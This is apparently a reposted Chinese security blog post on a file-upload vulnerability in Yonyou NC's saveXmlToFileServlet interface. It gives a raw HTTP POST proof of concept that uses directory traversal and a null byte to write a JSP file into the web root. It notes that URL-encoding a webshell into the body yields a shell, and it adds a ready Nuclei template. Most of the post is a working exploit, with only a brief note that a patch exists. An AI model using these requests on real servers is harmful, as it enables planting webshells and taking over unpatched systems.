以下为正文:
POC:
POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=..\..\..\webapps\nc_web\test9527.jsp%00 HTTP/1.1 Host: xxxxx Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36123
将马url编码即可getshell
Getshell:
Nuclei提供:小肥羊安全
id: yonyou-uap-saveXmlToFileServlet-upload-file
info:
name: yonyou-uap-saveXmlToFileServlet-upload-file
author: qianbenhyu
severity: high
http:
- method: POST
path:
- "{{BaseURL}}/portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=..\..\..\webapps\nc_web\{{randstr_1}}.jsp%00"
headers:
Cookie: LA_K1=langid
serverEnable: localserver
Accept-Encoding: gzip, x-gzip, deflate
Content-Length: 27
Content-Type: application/octet-stream
Content-Encoding: UTF_8
Connection: keep-alive
User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202)
body: "{{randstr_2}}"
- method: GET
path:
- "{{BaseURL}}/{{randstr_1}}.jsp"
matchers:
- type: word
words:
- "{{randstr_2}}"
该漏洞用友3.29已发布补丁,相关链接:https://security.yonyou.com/#/noticeInfo?id=533
| CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
原文始发于微信公众号(藏剑安全):1day利用|YONYOU NC saveXmlToFIleServlet接口文件上传
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论